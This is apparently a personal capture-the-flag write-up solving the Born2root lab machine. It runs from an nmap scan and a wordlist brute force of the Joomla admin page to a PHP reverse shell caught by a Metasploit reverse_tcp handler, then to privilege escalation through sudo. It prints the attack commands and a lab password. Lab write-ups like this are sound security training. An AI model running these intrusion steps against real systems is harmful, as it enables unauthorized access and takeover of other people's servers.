I decided to solve this box, although it’s not really new. The creator of this box didn’t give a proper description, but I suppose the goal is to get root and acquire the flag. I think the difficulty of the box is between beginner and intermediate level.
I started with the usual nmap scan. Here is the output of the scan:
root :: ~ » nmap -A -p- 192.168.1.148 Nmap scan report for born2root (192.168.1.148) Host is up (0.00082s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) | ssh-hostkey: | 1024 ec:61:97:9f:4d:cb:75:99:59:d4:c1:c4:d4:3e:d9:dc (DSA) | 2048 89:99:c4:54:9a:18:66:f7:cd:8e:ab:b6:aa:31:2e:c6 (RSA) | 256 60:be:dd:8f:1a:d7:a3:f3:fe:21:cc:2f:11:30:7b:0d (ECDSA) |_ 256 39:d9:79:26:60:3d:6c:a2:1e:8b:19:71:c0:e2:5e:5f (ED25519) 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-server-header: Apache/2.4.10 (Debian) |_http-title: Welcome to my website 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100024 1 41869/udp status |_ 100024 1 59562/tcp status 59562/tcp open status 1 (RPC #100024) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
I started exploring the web server further with
gobuster. It turned out there is a Joomla installation under the
It looked interesting and I scanned it with a few tools, started searching for exploits etc… but, no luck. I had a feeling that this must be the way in, so I fired up
cewl to generate a custom wordlist based on the site. Maybe, I will be successful with a brute force attack on the administrator page.
root :: /opt/cewl » ./cewl.rb -d 3 -w ~/Downloads/passwords.txt http://192.168.1.148/joomla CeWL 5.4.5 (Exclusion) Robin Wood (email@example.com) (https://digi.ninja/) root :: /opt/cewl » cd root :: ~ » cd Downloads root :: ~/Downloads » wc -c passwords.txt 787 passwords.txt
Well, the script generated 787 possible passwords, which was good enough for me. I navigated to the administrator page, enabled the Burp proxy and started Burp Suite.
I captured the login request and sent it to the Intruder. I cleared the auto-selected payload positions except for the password position.
Then, I loaded the previously created wordlist and loaded it as a simple list and started the attack.
It took a couple of minutes, but it was worth it. I sorted the results by status code, so I could easily see the 200 HTTP responses. I chose one and I was able to successfully log in.
My first thought was to upload a reverse shell, which is pretty easy at this point. I clicked on the Templates menu and selected the default Protostar template. You can upload any kind of file, but I uploaded my PHP reverse shell and executed it by navigating to:
Before doing that I set up my handler using Metasploit. After I got a connection back, I started poking around and looking for privilege escalation vectors.
msf5 > use multi/handler msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp payload => php/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 192.168.1.117 lhost => 192.168.1.117 msf5 exploit(multi/handler) > set lport 9898 lport => 9898 msf5 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.1.117:9898 [*] Sending stage (38247 bytes) to 192.168.1.148 [*] Meterpreter session 1 opened (192.168.1.117:9898 -> 192.168.1.148:50447) at 2019-05-28 15:01:24 +0200 meterpreter > sysinfo Computer : born2root OS : Linux born2root 3.16.0-6-586 #1 Debian 3.16.56-1 (2018-04-28) i686 Meterpreter : php/linux
/opt folder, I found an interesting python script, which contained a password.
I upgraded my shell with python so that I can switch user and use this password to log in as
tim. By the way, he used the same password for SSH access and it’s easier to work with a fully functional shell, but here I worked my way through with the simple netcat reverse shell.
python -c "import pty;pty.spawn('/bin/bash')" www-data@born2root:/var/www/html/joomla/templates/protostar$ su tim Password: lulzlol tim@born2root:/var/www/html/joomla/templates/protostar$ sudo -l [sudo] password for tim: lulzlol Matching Defaults entries for tim on born2root: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User tim may run the following commands on born2root: (ALL : ALL) ALL
As you can see,
tim can run everything as root without needing the root password. Let’s switch to root!
tim@born2root:/var/www/html/joomla/templates/protostar$ sudo su root@born2root:/var/www/html/joomla/templates/protostar# cd /root root@born2root:~# ls flag.txt
Finally, I printed out the one and only flag in the
root@born2root:~# cat flag.txt .andAHHAbnn. .aAHHHAAUUAAHHHAn. dHP^~" "~^THb. . .AHF YHA. . | .AHHb. .dHHA. | | HHAUAAHAbn adAHAAUAHA | I HF~"_____ ____ ]HHH I HHI HAPK""~^YUHb dAHHHHHHHHHH IHH HHI HHHD> .andHH HHUUP^~YHHHH IHH YUI ]HHP "~Y P~" THH[ IUP " `HK ]HH' " THAn. .d.aAAn.b. .dHHP ]HHHHAAUP" ~~ "YUAAHHHH[ `HHP^~" .annn. "~^YHH' YHb ~" "" "~ dHF "YAb..abdHHbndbndAP" THHAAb. .adAHHF "UHHHHHHHHHHU" ]HHUUHHHHHH[ .adHHb "HHHHHbn. ..andAAHHHHHHb.AHHHHHHHAAbnn.. .ndAAHHHHHHUUHHHHHHHHHHUP^~"~^YUHHHAAbn. "~^YUHHP" "~^YUHHUP" "^YUP^" "" "~~" W00t w00t ! If you are reading this text then Congratulations !! I hope you liked the second episode of 'Born2root' if you liked it please ping me in Twitter @h4d3sw0rm . If you want to try more boxes like this created by me, try this new sweet lab called 'Wizard-Labs' which is a platform which hosts many boot2root machines to improve your pentesting skillset https://labs.wizard-security.net ! Until we meet again :-) root@born2root:~#
If you found this article helpful, please share to help others with similar interest find it! + Feedback and donations are always welcome!